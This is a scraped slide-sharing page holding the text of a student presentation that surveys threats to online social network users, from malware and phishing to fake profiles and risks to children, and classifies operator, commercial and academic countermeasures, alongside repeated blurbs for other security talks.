The document discusses various threats faced by users of online social networks and solutions to address those threats. It categorizes threats into classic threats like malware, phishing and spam; modern threats unique to social networks like clickjacking, de-anonymization attacks and fake profiles; combination threats; and threats targeting children. It then provides taxonomies of solutions developed by social network operators, commercial companies and academics to mitigate these threats through methods like authentication mechanisms, privacy settings, internal protection systems and user reporting features.
Get more versatile and scalable protection with F5 BIG-IPF5NetworksAPJ
- Better protect against costly failures in outbound web security
- Improve scalability, availability, performance, and user experience
- Consolidate application access, secure web access, reducing network footprint and device management
A few slides on Robert Seacord's book, "Secure Coding in C/C++". While the McAfee template was used for the original presentation, the info from this presentation is public.
Slides for a college course at City College San Francisco. Based on "The Shellcoder's Handbook: Discovering and Exploiting Security Holes ", by Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte; ASIN: B004P5O38Q.
Instructor: Sam Bowne
Class website: https://samsclass.info/127/127_S17.shtml
These slides provide instructions on how to setup a virtual security training lab that uses OWASP Broken Web Apps, OWASP WebGoat, and OWASP ZAP running on top of Virtual Box.
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
Would you want to let your kids discover the darker corners of the internet without protection? Wouldn't it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games?
Worry no longer, the South Korean government got you covered. Simply install the "Smart Sheriff" app on your and your kids' phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring!
Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn't solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved into the first and, who would have guessed, second penetration test against the "Smart Sheriff" app, will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then?
We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder, always delivers the best results. Right?
Going over the first and second pentest results we will share our impressions about the "security" of this ecosystem and show examples about the "comprehensive" vendor response, addressing "all" the findings impeccably. This talk is a great example of how security research about a serious political decision and mandate might achieve nothing at all - or show, how a simple pentest together with excellent activist work can maybe spark a political discussion and more.
Presented at OWASP AppSecUSA 2011
It's all about scale; how can an organization possibly keep up with a growing number of web applications, features, and supported capabilities with a limited security team? One option that has provided successful results for several companies is a bug bounty program. These programs successfully engage the world community and bring many eyes towards the common good.
This talk will discuss the benefits and risks of a bounty program for web applications. What types of organizations consider starting a bounty? How would an organization start such a program and what should they expect? Is the return worth the effort? How does such a program compete with the black market?
In addition to these topics, we will also discuss the progress, metrics and lessons learned from the Mozilla web application bounty that was launched in December 2010.
Get more versatile and scalable protection with F5 BIG-IPF5NetworksAPJ
- Better protect against costly failures in outbound web security
- Improve scalability, availability, performance, and user experience
- Consolidate application access, secure web access, reducing network footprint and device management
A few slides on Robert Seacord's book, "Secure Coding in C/C++". While the McAfee template was used for the original presentation, the info from this presentation is public.
Slides for a college course at City College San Francisco. Based on "The Shellcoder's Handbook: Discovering and Exploiting Security Holes ", by Chris Anley, John Heasman, Felix Lindner, Gerardo Richarte; ASIN: B004P5O38Q.
Instructor: Sam Bowne
Class website: https://samsclass.info/127/127_S17.shtml
These slides provide instructions on how to setup a virtual security training lab that uses OWASP Broken Web Apps, OWASP WebGoat, and OWASP ZAP running on top of Virtual Box.
Smart Sheriff, Dumb Idea, the wild west of government assisted parentingAbraham Aranguren
Would you want to let your kids discover the darker corners of the internet without protection? Wouldn't it be handy to know what they do online, to be alerted when they search for dangerous keywords and to be able to control what websites they can visit, and even when they play games?
Worry no longer, the South Korean government got you covered. Simply install the "Smart Sheriff" app on your and your kids' phones. Smart Sheriff is the first parental-control mobile app that has been made a legally required, obligatory install in an entire country! Yay, monitoring!
Well, something shady yet mandatory like this cannot go without an external pentest. And even better, one that wasn't solicited by the maintainer but initiated by the OTF and CitizenLab and executed by the Cure53 team! In this talk, two of the Cure53 testers involved into the first and, who would have guessed, second penetration test against the "Smart Sheriff" app, will share what they found. Maybe all was fine with the app, maybe the million kids forced to have this run on their devices were all safe. Maybe. But would there be a talk about it then?
We all know, mandated surveillance apps to protect children are a great idea, and outsourcing to the lowest bidder, always delivers the best results. Right?
Going over the first and second pentest results we will share our impressions about the "security" of this ecosystem and show examples about the "comprehensive" vendor response, addressing "all" the findings impeccably. This talk is a great example of how security research about a serious political decision and mandate might achieve nothing at all - or show, how a simple pentest together with excellent activist work can maybe spark a political discussion and more.
Presented at OWASP AppSecUSA 2011
It's all about scale; how can an organization possibly keep up with a growing number of web applications, features, and supported capabilities with a limited security team? One option that has provided successful results for several companies is a bug bounty program. These programs successfully engage the world community and bring many eyes towards the common good.
This talk will discuss the benefits and risks of a bounty program for web applications. What types of organizations consider starting a bounty? How would an organization start such a program and what should they expect? Is the return worth the effort? How does such a program compete with the black market?
In addition to these topics, we will also discuss the progress, metrics and lessons learned from the Mozilla web application bounty that was launched in December 2010.
Conduct a few internal pen tests and you’re bound to come across Jenkins, the world’s most popular build automation server. When you encounter it, what do you do? Go beyond a 5-minute Google search and checking for open script consoles. This talk dives into various ways to exploit Jenkins and how to move laterally into sensitive systems.
Discusses how to perform malware analysis on Android devices. Initially presented at BSidesDE 2011 (in a much more fun format), the version here is as-presented at Rochester Security Summit 2011.
This presentation will cover all you need to know about mobile and application device security.
With an introduction, threats, applications, security, and useful tips for people who need to know
So, let's get started. If you enjoy this and find the information beneficial, please like and share it with your friends.
Auditing Multimedia Campaigns -ASI 2008 European Conference - FurlanettoPaola Furlanetto
. 3 reasons why A+ worked on Multimedia Audit
. A Media Audit case history, including:
- "old style" mono media assessment
- "uptodate" multimedia assessment
Conduct a few internal pen tests and you’re bound to come across Jenkins, the world’s most popular build automation server. When you encounter it, what do you do? Go beyond a 5-minute Google search and checking for open script consoles. This talk dives into various ways to exploit Jenkins and how to move laterally into sensitive systems.
Discusses how to perform malware analysis on Android devices. Initially presented at BSidesDE 2011 (in a much more fun format), the version here is as-presented at Rochester Security Summit 2011.
This presentation will cover all you need to know about mobile and application device security.
With an introduction, threats, applications, security, and useful tips for people who need to know
So, let's get started. If you enjoy this and find the information beneficial, please like and share it with your friends.
Auditing Multimedia Campaigns -ASI 2008 European Conference - FurlanettoPaola Furlanetto
. 3 reasons why A+ worked on Multimedia Audit
. A Media Audit case history, including:
- "old style" mono media assessment
- "uptodate" multimedia assessment
A Survey of Security & Privacy in Online Social Networks (OSN) with regards t...Frances Coronel
Published December 14, 2015, in Social media
Research Presentation on Online Social Networks (OSN) Privacy.
CSC 425
Senior Seminar
Hampton University
Fall 2015
---
FVCproductions
https://fvcproductions.com
Anti-bribery, digital investigation and privacyPECB
This presentation was delivered at the ISO 37001 & Anti-Bribery PECB Insights Conference by Sylvain Desharnais, Digital investigation at CFIJ in Canada
Media and Information Literacy (MIL) - 8. Opportunities ,Challenges, and Powe...Arniel Ping
Content
8. Opportunities, Challenges, and Power of Media and Information
a. Economic, Educational,
Social, and Political
b. Threats, Risks, Abuse, and
Misuse
Learning Competencies
The students will be able to…
1. realize opportunities and challenges in media and information (MIL11/12OCP-IIIh-24);
2. create infographics showing opportunities and challenges in media and information (SSHS); and
3. research and cite recent examples of the power of media and information to affect change (MIL11/12OCP-IIIh-25)
Media and Information Literacy (MIL) - Intellectual Property, Fair Use, and C...Arniel Ping
Media and Information Literacy (MIL) Legal, Ethical, and Societal Issues in Media and Information (Part 1)
Topics:
1. Intellectual Property in International
and Local Context
2. Fair Use and Creative Commons
LEARNING COMPETENCIES:
1. explain intellectual property and its different types (SSHS);
2. explain copyright, fair use, etc.vis-a-vis human rights (MIL11/12LESI-IIIg20);
3. discuss current issues related to copyright vis-à-vis gov’t./provide sectors actions (MIL11/12LESI-IIIg21);
4. put into practice their understanding of the intellectual property, copy right, and fair use guidelines (MIL11/12LESI-IIIg17); and
5. explain actions to promote ethical use of media and information (MIL11/12LESI-IIIg22);
Media and Information Literacy (MIL) 7. Legal, Ethical, and Societal Issues i...Arniel Ping
Erratum.Page 23 0f 29. Formative Assessment Question no. 1 is ''Why is plagiarism?''. The correct question is ''What is plagiarism?''. Thank you very much.
Legal, Ethical, and Societal Issues in Media and Information (Part 3)
Topic: Plagiarism:
Learning Competencies
a. define plagiarism;
b.identify and explain the different types of plagiarism;
c. value the importance of understanding the different types of plagiarism; and
d. practice academic honesty and integrity by not committing plagiarism.
Social media privacy threats that you need to keep an eye on in 2021Impulse Digital
Social media users' interests about information protection have seen a sharp ascent throughout the most recent couple of years. Cybercriminals have developed the ability to deceive social based media users into sharing touchy individual data and information.
Exploring machine learning techniques for fake profile detection in online so...IJECEIAES
The online social network is the largest network, more than 4 billion users use social media and with its rapid growth, the risk of maintaining the integrity of data has tremendously increased. There are several kinds of security challenges in online social networks (OSNs). Many abominable behaviors try to hack social sites and misuse the data available on these sites. Therefore, protection against such behaviors has become an essential requirement. Though there are many types of security threats in online social networks but, one of the significant threats is the fake profile. Fake profiles are created intentionally with certain motives, and such profiles may be targeted to steal or acquire sensitive information and/or spread rumors on online social networks with specific motives. Fake profiles are primarily used to steal or extract information by means of friendly interaction online and/or misusing online data available on social sites. Thus, fake profile detection in social media networks is attracting the attention of researchers. This paper aims to discuss various machine learning (ML) methods used by researchers for fake profile detection to explore the further possibility of improvising the machine learning models for speedy results.
This is a summary of what cyber crime is all about, the history of cyber crime; motivation behind cyber attack as well as the various techniques used in committing those crimes; Cybercrime groups starting to operate like the Mafia; how cyber crimes exploits Web2.0 opportunites and Top Computer Secuity Actions.
Cyberspace is a domain characterized by the use of electronics and the electromagnetic spectrum to store, modify, and exchange data via networked systems and associated physical infrastructures.
1. Cyber Ethics and Cyber Crime
2. Security in Social Media & Risk of Child Internet
3. Social media in Schools and photo privacy
4. Risk of OSNs and Security, Privacy of Facebook
5. Risk and Security of Social Networking site Facebook and Twitter
6. Risk analysis of Government and Online Transaction
The International Journal of Engineering & Science is aimed at providing a platform for researchers, engineers, scientists, or educators to publish their original research results, to exchange new ideas, to disseminate information in innovative designs, engineering experiences and technological skills. It is also the Journal's objective to promote engineering and technology education. All papers submitted to the Journal will be blind peer-reviewed. Only original articles will be published.
This Imperva Hacker Intel report details the never-before-seen details on an attack by hacktivist group 'Anonymous' against a high-profile unnamed target during a 25 day period in 2011. The report offers a comprehensive analysis of the attack, including a detailed timeline of activities from start to finish, an examination of the hacking methods utilized, as well as insights on the use of social media to recruit participants and coordinate the attack.
A Survey of Methods for Spotting Spammers on Twitterijtsrd
Social networking sites explosive expansion as a means of information sharing, management, communication, storage, and management has attracted hackers who abuse the Web to take advantage of security flaws for their own nefarious ends. Every day, forged internet accounts are compromised. Online social networks OSNs are rife with impersonators, phishers, scammers, and spammers who are difficult to spot. Users who send unsolicited communications to a large audience with the objective of advertising a product, entice victims to click on harmful links, or infect users systems only for financial gain are known as spammers. Many studies have been conducted to identify spam profiles in OSNs. In this essay, we have discussed the methods currently in use to identify spam Twitter users. User based, content based, or a combination of both features could be used to identify spammers. The current paper gives a summary of the traits, methodologies, detection rates, and restrictions if any for identifying spam profiles, primarily on Twitter. Hareesha Devi | Pankaj Verma | Ankit Dhiman "A Survey of Methods for Spotting Spammers on Twitter" Published in International Journal of Trend in Scientific Research and Development (ijtsrd), ISSN: 2456-6470, Volume-7 | Issue-3 , June 2023, URL: https://www.ijtsrd.com.com/papers/ijtsrd57439.pdf Paper URL: https://www.ijtsrd.com.com/computer-science/artificial-intelligence/57439/a-survey-of-methods-for-spotting-spammers-on-twitter/hareesha-devi
Social media websites are becoming more prevalent on the Internet. Sites, such as Twitter, Facebook, and Instagram, spend significantly more of their time on users online. People in social media share thoughts, views, and facts and create new acquaintances. Social media sites supply users with a great deal of useful information. This enormous quantity of social media information invites hackers to abuse data. These hackers establish fraudulent profiles for actual people and distribute useless material. The material on spam might include commercials and harmful URLs that disrupt natural users. This spam content is a massive problem in social networks. Spam identification is a vital procedure on social media networking platforms. In this paper, we have proposed a spam detection artificial intelligence technique for Twitter social networks. In this approach, we employed a vector support machine, a neural artificial network, and a random forest technique to build a model. The results indicate that, compared with RF and ANN algorithms, the suggested support vector machine algorithm has the greatest precision, recall, and Fmeasure. The findings of this paper would be useful in monitoring and tracking social media shared photos for the identification of inappropriate content and forged images and to safeguard social media from digital threats and attacks.
2. INDEX
• ONLINE SOCIAL NETWROKS (OSN)
• THREATS IN OSN AND ITS TAXONOMY
• ONLINE SOCIAL NETWORK THREATS SOLUTIONS TAXONOMY
• USER ORIENTED SOLUTIONS TAXONOMY
• IMPORTANCE OF ACCESS CONTROL SOLUTIONS
• ACCESS CONTROL SOLUTIONS
• REFERENCES
3. Online Social Networks[1]
• A social network (SN) is a set of people connected to each other by social relationships.
• Offline Social Networks refer to real-world social communities.
• Online Social Networks (OSNs) are web-based services that offer the functionality of
creating a personal representation of one’s self through which one can socialize with others.
• A main feature of OSNs is the articulation of various types of relationships between
profiles to facilitate the social communication with others.
• The social communication includes various activities such as sharing objects, creating
groups, organizing online and offline events, etc.
• For example Facebook, Twitter, Foursquare, Linked etc.
5. Classic Threats[1]
• Often referred to as malware, spam, cross-site scripting (XSS) attacks, or
phishing, they continue to be an ongoing issue.
• Classic threats take advantage of a user’s personal information published in a
social network to attack not only the user but also their friends simply by
adjusting the threat to accommodate the user’s personal information.
6. Contd.
• For example, in many cases, these threats target essential and everyday user
resources such as credit card numbers, account passwords, computing power,
and even computer bandwidth (in order to send spam emails).
7. Types of Classic Threats[1]
• I. Malware: Malware is malicious software developed to disrupt a computer
operation in order to collect a user’s credentials and gain access to his or her
private information.
For example: Koobface was the first malware to successfully propagate
through OSNs such as Facebook, MySpace, and Twitter.
Koobface attempts to collect login information and join the infected
computer in order to be part of a botnet, a so-called “zombie army” of
computers.
9. Control and sustainability for malwares
Methods Description
Command-and-control Command-and-control botnets are managed by a single central controller,
often a purpose-built botnet control console such as Zunker, WebAttacker,
MPack, or IcePack..
Drive-by attacks Cybercriminals use a couple of different drive-by attack mechanisms. In one, a
bogus website scans a site visitor’s system for specific vulnerabilities.
HTTP Here it is hiding their command-and-control messages to zombie armies inside
innocent web communications protocols.
Internet relay chat (IRC) This mature communications protocol from early network bulletin boards lets
anyone hold live keyboard conversations with other computers.
10. Contd.
Methods Description
Peer-to-peer A botnet fault-tolerant strategy, peer-to-peer botnets ignore the loss of any
controller and continue operating standalone until a new manager emerges.
Pull propagation A classic bot attack “pushes” spam with a special offer or lure containing a
malicious payload.
Zero-day exploit A zero-day exploit refers to the release of code whose purpose it is to exploit a
just-published or unpublished vulnerability within an OS
Zero-day window of
opportunity
Zero-day window refer to the time between announcement of a vulnerability
and the release and installation of its associated patch.
11. Contd.
• II. Phishing Attacks: Phishing attacks are a form of social engineering to
acquire user-sensitive and private information by impersonating a
trustworthy third party.
12. Contd. [1]
• III. Spammers: Spammers are users who use electronic messaging systems
in order to send unwanted messages, like advertisements, to other users.
An example of the prevalence of network spamming can be found on
Twitter, which has suffered from a massive amount of spam and in August
2009, 11% of Twitter messages were spam messages.
Nevertheless, a 2013 article states, “Social spam, as it already exists on
Twitter, will continue to grow and unless the company addresses the problem
quickly, it may be the one thing that sinks it.”
13. Cont.[1]
• IV. Cross-Site Scripting (XSS): An XSS attack is an assault against web
applications.
• The attacker who uses the XSS exploits the trust of the web client in the web
application and causes the web client to run malicious code capable of collecting
sensitive information.
XSS worm, called Mikeyy, rapidly transmitted automated tweets across Twitter and
infected many users.
The Mikeyy worm used an XSS weakness and the Twitter network structure to
spread through Twitter user profiles .
14. Contd.[1]
• V. Internet Fraud: Internet fraud, also known as cyber fraud, refers to using
Internet access to scam or take advantage of people.
For example, fraudsters have been hacking into the accounts of Facebook
users who travel abroad.
Once they manage to log into a user’s account, the scammers cunningly ask
the user’s friends for assistance in transferring money to the scammer’s bank
account.
15. Modern Threats[1]
• Modern threats are typically unique to OSN environments.
• Usually these threats specifically target users’ personal information as well as the personal
information of their friends.
For example, an attacker who is trying to gain access to a Facebook user’s high school
name—view able only by the user’s Facebook friends—can create a fake profile with
pertinent details and initiate a friend request to the targeted user.
If the user accepts the friend request, his or her details will be exposed to the attacker.
Alternatively, the attacker can collect data from the user’s Facebook friends and employ an
inference attack to infer the high school name from the data collected from the user’s
friends.
16. Types of Modern Threats[1]
• I. Clickjacking: Clickjacking is a malicious technique which tricks users into
clicking on something different from what they intended to click.
An example of a click-jacking attack occurred on Twitter in 2009 when
Twitter was plagued by a “Don’t Click” attack.
The attacker tweeted a link with the message “Don’t Click” along with a
masked URL (the actual URL domain was hidden).
When Twitter users clicked on the “Don’t Click” message, the message
automatically spread virally and was posted onto their Twitter accounts.
17. Contd. [1]
• II. De-Anonymization Attacks: This attacks use techniques such as
tracking cookies, network topology, and user group memberships to uncover
the user’s real identity.
Most recent example was presented by Peled et al; who introduced a method
for matching user profiles across several OSNs.
The method was evaluated by matching profiles across Facebook and Xing.
18. Contd.[1]
• III. Face Recognition: Many people
use OSNs for uploading pictures
of themselves and their friends.
Millions and millions of photos
are uploaded to Facebook each
Day.
19. Survey Results
Experiments Types Observation
1 online to online image datasets by using publicly accessible
2 offline to online image datasets can also be matched. namely,
they used publicly available images
3 personal and sensitive information from a
face; an individual’s interests, activities, and
even his or her social security number could
be automatically predicted by matching the
face image with the person’s Facebook image
to obtain the person’s full name.
20. Contd.
• IV. Fake Profiles: Fake profiles (also referred to as sybils or socialbots) are
automatic or semi-automatic profiles that mimic human behaviours in OSNs.
• These can be used to harvest users’ personal data from social networks.
For example: From one of the survey, it was found that an army of more
than a 100 Facebook socialbots was created which attempted to infiltrate
innocent Facebook profiles, by initiating a series of friend requests. The
socialbot army succeeded in generating approximately 250 GB of inbound
Facebook traffic.
21. Contd.
• V. Identity Clone Attacks: The attackers duplicate a user’s online presence
either in the same network, or across different networks, to deceive the
cloned user’s friends into forming a trusting relationship with the cloned
profile.
An example of an identity clone attack occured with NATO’s most senior
commander, Admiral James Stavridis, where his profile details were cloned
and then used to collect data on defence ministry officials.
22. Contd.
• VI. Inference Attacks: These are used to predict a user’s personal, sensitive
information that the user has not chosen to disclose, such as religious
affiliation or sexual orientation.
An inference attack was demonstrated by Mislove et al, who presented
techniques for predicting a user’s attributes based on other users’ attributes in
the OSN, where they tested their techniques and inferred different Facebook
users’ attributes, such as educational, geographical, and their personal
information.
23. Contd.[1]
• VII. Information Leakage: Users willingly share sensitive information
about themselves and other people, such as health related information, and
sobriety status.
For example, insurance companies may use OSN data to identify risky
clients, as this companies can use OSN leaked information to detect clients
with medical conditions, consequently increasing their premium or denying
the coverage.
24. Information leakage in OSN[2]
Table:- OSN functions and potential problems to organisations [2]
25. Factors responsible for information leakages
• The Decomposed Theory of Planned Behaviour an extension to Theory of
Planned Behaviour comprises the following factors for information scanning and
leakages:-
• Attitude towards OSN use
• Social Influence
• Perceived Behavioural Control
• One of the existing example is APT ADVANCED PERSISTENT THREATS
26. Control measures for Prevention
• Information Security Policy (ISP)
• Security Education, Training and Awareness
• Preventive Security Systems
27. Contd.[1]
• VIII. Location Leakage: Many people use OSNs to willingly share private
and sometimes sensitive information about their (or their friends’) current or
future whereabouts.
One such example of location leakage threats is given by the website
Pleaserobme.com, which shows a way to find the location information of
specific Twitter and Foursquare users.
28. Contd.[1]
• IX. Socware: Socware entails fake and possibly damaging posts and
messages from friends in OSNs.
• Socware may lure victims by offering false rewards to users who install
socware-related malicious Facebook applications or visit questionable
socware websites.
For example: In 2012, Rahman et al, investigated over 40 million posts and
discovered that 49% of the studied users were exposed to at least one
socware post in a four-month period.
29. Working of socware
Mechanisms :-
Propagation mechanism
Exploitation mechanism
Socware
Post consisting of URLs posts typically contain a catchy
text message
30. How does socware work?
(a) Application installation process on Facebook
32. Prevention techniques
• Socware was indentified and detected through MyPageKeeper, which is an application.
• Following are the basic components on which this application works:-
User authorization module
Crawling module
Feature extraction module
Classification module
Notification module
User feedback module
33. Combination Threats [1]
For example, an attacker can use a phishing attack to collect a targeted user’s
Facebook password and then post a message containing a clickjacking attack
on the targeted user’s timeline, thus luring the user’s Facebook friends to
click on the posted message and install a hidden virus onto their own
computers.
Classic threats Modern threats Combination threats
34. Threats Targeting Children
• Due to the critical nature of this topic, this section highlights those threats,
as well as describes specific findings from current studies.
35. Types of Threats Targeting Children[1]
• Online Predators: The greatest concern regarding the personal information
safety of children relates to Internet pedophiles, also referred to as online
predators.
Types of harm Categorization
harm from content a child’s exposure to pornography or harmful sexual content
harm from contact a child who is contacted by an adult or another child for the purpose
of sexual abuse
harm from conduct the child as an active initiator of abusive or risky behaviours
36. Contd.
• Risky Behaviours: Potential risky behaviours of children may include direct
online communication with strangers, use of chat rooms for interactions
with strangers, sexually explicit talk with strangers, and giving private
information and photos to strangers.
Re-searchers contend that victims of Internet abuse are very often
vulnerable children, such as youths with a history of physical or sexual abuse
or those who suffer from depression or social interaction problems.
37. Contd.
• Cyberbullying: Cyberbullying (also referred to as cyber abuse) is bullying
that takes place within technological communication platforms, emails, chats,
phones conversations, and OSNs, by an attacker.
38. Threats to Online Social Networks Users
Classic Threats Modern Threats Combination Threats Threats targeting Children
Malware
Phishing Attacks
Spammers
Cross Site Scripting
(XSS)
Internet Fraud
Clickjacking
De anonymization
Attacks
Face Recognition
Fake Profiles
(Socialbots)
Identify Clone Attacks
Inference Attacks
Information Leakage
Location Leakage
Socware
Online
Predators
Risky
Behaviours
Cyberbullying
Taxonomy of Online Threats[1]
Combination
of clickjacking
and phishing
attacks
40. User Threats Solutions
Some crucial threats
Operator solutions Commercial Solutions Academic Solutions
Authentication
mechanisms
Security and Privacy
settings
Internal Protection
Mechanisms
Report Users MinorMonitor
Defensio
MyPermissions
FB Phishing
Protector
Preventing
Information
and Location
Leakage
Cloned Profile
Detection
41. Operator Solutions Taxonomy[1]
• OSN operators attempt to protect their users by activating safety measures,
such as employing user authentication mechanisms and applying user privacy
settings. Several of these techniques are described in detail below.
42. I. Authentication Mechanisms[1]
• OSN operators use authentication mechanisms, such as CAPTCHA, photos-
of-friends identification, multi-factor authentication, and in some cases even
requesting that the user send a copy of his or her government issued ID.
44. II. Security and Privacy Settings[1]
• Many OSNs support various configurable user privacy settings that enable
users to protect their personal data from other users or applications.
45. Procedural Approach [5]
Stages Steps Description
1 Survey of Privacy Attitude Survey the participant’s privacy attitudes and their experience with Facebook.
2 Collection of Intentions Gather participant’s sharing intentions for each profile group per information
category using a table of information categories and profile groups.
3 Identification of Potential
Violations
Examine participant’s Facebook data to identify potential violations based on the
intentions stated in Stage 2.
4 Confirmation of Violations Present participant with their potential violations, allow them to confirm the actual
violations, and survey their intent to act on the violation.
47. III. Internal Protection Mechanisms[1]
• Several OSNs protect their users by implementing additional internal
protection mechanisms for defence against spammers, fake profiles, scams,
and other threats.
• Facebook, for example, protects its users from malicious attacks and
information collecting by activating the Facebook Immune System (FIS).
• The FIS is described as an adversarial learning system that performs real-
time checks and classifications on read-and-write actions on Facebook’s
database.
48. IV. Report Users
Procedure:
• To report a user, go to their user page, and
click on the Report this User button below the
What I've Been Doing section.
• One you have selected what you are
reporting, you can either press Send to send
the report to the Scratch Team or press
Cancel to cancel the report.
When should a user be reported?
If his/her username is inappropriate
If he/she has an inappropriate icon or
inappropriate text in the description fields
The "user" is impersonation of another user
49. Commercial solutions Taxonomy[1]
• Various commercial companies have expanded their traditional Internet
security options and now offer software solutions specifically for OSN users
to better protect themselves against threats.
50. I. FB Phishing Protector
• FB Phishing Protector is a Firefox add-on which warns Facebook users
when a suspicious activity is detected, such as a script-injection attempt.
• This add-on provides protection against various phishing attacks
• The FB Phishing Protector add-on works by detecting and blocking XSS
(cross side script) injection in the Facebook content.
51. II. Mypermissions
• Online Permissions Technologies’ MyPermissions is a web service that
provides its users with convenient links to the permissions pages for many
OSNs, such as Facebook, Twitter, and LinkedIn.
• These links can help users view and revoke the permissions they had given in
the past to various applications, thus better protecting their privacy.
53. III. Defensio
• Websense’s Defensio web service helps protect social network users from threats like links to malware that
could be posted on the user’s Facebook page.
• The Defensio service also assists in preventing information leakage by controlling the user’s published
content by removing certain words from posts or filtering specific comments.
• Following are some of the malicious contents which Defensio detects:-
Spam content
Attempts to distribute malware
Links to undesirable content categories (e.g., adult material, gambling, etc.)
Links to executable files
The inclusion of JavaScript or VBScript
55. IV. MinorMonitor
• Infoglide’s MinorMonitor is a parental control web-service which gives
parents a quick dashboard view of their child’s Facebook activities and online
friends.
• By using MinorMonitor, parents can be informed about questionable
content that may have been revealed to their child, and they can identify
overage friends in their child’s Facebook friends list.
57. Academic solutions[1]
• These solutions have primarily focused on identifying malicious users and
applications.
• These academic solutions provide cutting-edge insight into dealing with
social network threats.
• They can be used by OSN operators to improve their users’ security and
privacy, by security companies to offer the customers better OSN protection,
or by early-adopter OSN users who want to better protect themselves.
58. I. Cloned Profile Detection
• A cloned profile could be used to send falsified messages in order to harm
the original user.
• The victimized user has no way of knowing the existence of the fake profiles
(especially if across social networks).
Methodology[6]:-
• It’s a prototype which can be employed to investigate whether or not users
have fallen victim to clone attacks.
59. System design and its working [6]
Figure:- Methodogy to detect cloned profiles
61. Module wise working approach
• Here “guardian angel service” that can monitor users’ tweets and alert users to potential privacy
violations.
The Classifier module is used to automatically detect sensitive tweets.
The Content Analysis module provides information about what private topics are revealed from drunk
and disease related tweets, which also can be utilized by Classifier to select classification labels.
The system thus outputs a stream of sensitive tweets leaking private information through the Classifier.
62. Taxonomy of Access control solutions
• Access control Solutions
Operator
solutions
Commercial
solutions
MyPermissions
Defensio
MinorMonitor
63. Importance of Access control [8]
• Online social networks (OSNs) have analyses large growth in recent years and
become a saturation for hundreds of millions of Internet users.
• These OSNs offer to enforce attractive means for digital social interactions and
information contribution, but also increase a number of security and privacy issues.
• Right to use manage mechanism is provide to restrict shared data, they currently do
not provide any mechanism to minimize problem of multiuser shared data.
• Hence access control mechanisms has become the prime need in order to secure the
Online social networking.
66. COMPARATIVE ANALYSIS
Solutions Threats
Information
Leakage
Location
Leakage
Socware Cyberbullying Internet Fraud Spammers Fake profiles Face
Recognization
Identify clone
attack
Information
Security
Policy(ISP),
Security
Education,
Training And
Awareness
(SETA) &
Preventive
security
systems.
Yes Yes Yes Yes Yes No No No No
MyPageKeeper
application
Yes Yes Yes No No Yes No No No
67. Solutions Threats
Information
Leakage
Location
Leakage
Socware Cyberbullying Internet Fraud Spammers Fake profiles Face
Recognization
Identify clone
attack
Photo-based
social
authentication ;
including node
attributes and
edge attributes
No No No No Yes No Yes Yes Yes
Application and
stage wise
approach
No No No No No No Yes Yes No
69. References
1. Online Social Networks: Threats and Solutions, Michael Fire, Roy
Goldschmidt, and Yuval Elovici, 2014
2. Information Leakage through Online Social Networking: Opening the
Doorway for Advanced Persistence Threats, Nurul Nuha Abdul Molok
University of Melbourne Shanton Chang, 2010
3. Efficient and Scalable Socware Detection in Online Social Networks, Md
Sazzadur Rahman, Ting-Kai Huang, Harsha V. Madhyastha, Michalis
Faloutsos.
70. Contd.
4. New Directions in Social Authentication, Sakshi Jain ,Juan Lang, Neil
Zhenqiang Gong, Dawn Song, Sreya Basuroy, Prateek Mittal
5. The Failure of Online Social Network Privacy Settings, Michelle Madejskiy
Maritza Johnson, Steven M. Bellovin.
6. Detecting Social Network Profile Cloning, Georgios Kontaxis, Iasonas
Polakis, Sotiris Ioannidis and Evangelos P. Markatos, Georgios Kontaxis,
Iasonas Polakis, Sotiris Ioannidis and Evangelos P. Markatos, 2011
71. Contd.
7. Loose Tweets: An Analysis of Privacy Leaks on Twitter, Huina Mao, Xin
Shuai, Apu Kapadia
8. An Access Control Model for Online Social Networks Using User-to-User
Relationships, Yuan Cheng, Jaehong Park, and Ravi Sandhu, 2015.